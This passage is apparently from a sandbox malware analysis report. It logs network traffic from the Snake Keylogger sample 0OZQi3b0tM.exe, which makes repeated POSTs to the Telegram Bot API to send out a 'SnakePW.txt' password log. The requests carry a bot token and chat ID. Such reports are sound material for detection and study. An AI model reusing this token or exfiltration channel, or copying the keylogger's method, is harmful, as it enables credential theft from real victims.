                            Date: Sun, 26 Jun 2022 07:34:07 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:07 UTC352INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66982,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228847,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            209192.168.2.550103149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:08 UTC352OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570a1c5b38
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:08 UTC353OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 31 63 35 62 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570a1c5b38Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:08 UTC353INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:08 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:08 UTC354INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66983,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228848,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            21192.168.2.549789149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:46 UTC35OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d96b65d8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:46 UTC35OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 36 62 36 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d96b65d8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:47 UTC36INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:47 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:47 UTC36INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66768,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228767,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            210192.168.2.550104149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:09 UTC354OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570a53311c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:09 UTC354OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 35 33 33 31 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570a53311cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:09 UTC355INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:09 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:09 UTC355INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66984,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228849,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            211192.168.2.550108149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:09 UTC356OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570a95f6b0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:09 UTC356OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 39 35 66 36 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570a95f6b0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:09 UTC357INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:09 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:09 UTC357INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66985,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228849,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            212192.168.2.550112149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:09 UTC358OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570accc8e1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:09 UTC358OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 63 63 63 38 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570accc8e1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:10 UTC358INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:10 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:10 UTC359INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66987,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228850,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            213192.168.2.550114149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:10 UTC359OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570b0865d5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:10 UTC360OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 30 38 36 35 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570b0865d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:10 UTC360INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:10 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:10 UTC360INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66988,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228850,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            214192.168.2.550118149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:10 UTC361OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570b466176
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:10 UTC361OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 34 36 36 31 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570b466176Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:10 UTC362INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:10 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:10 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
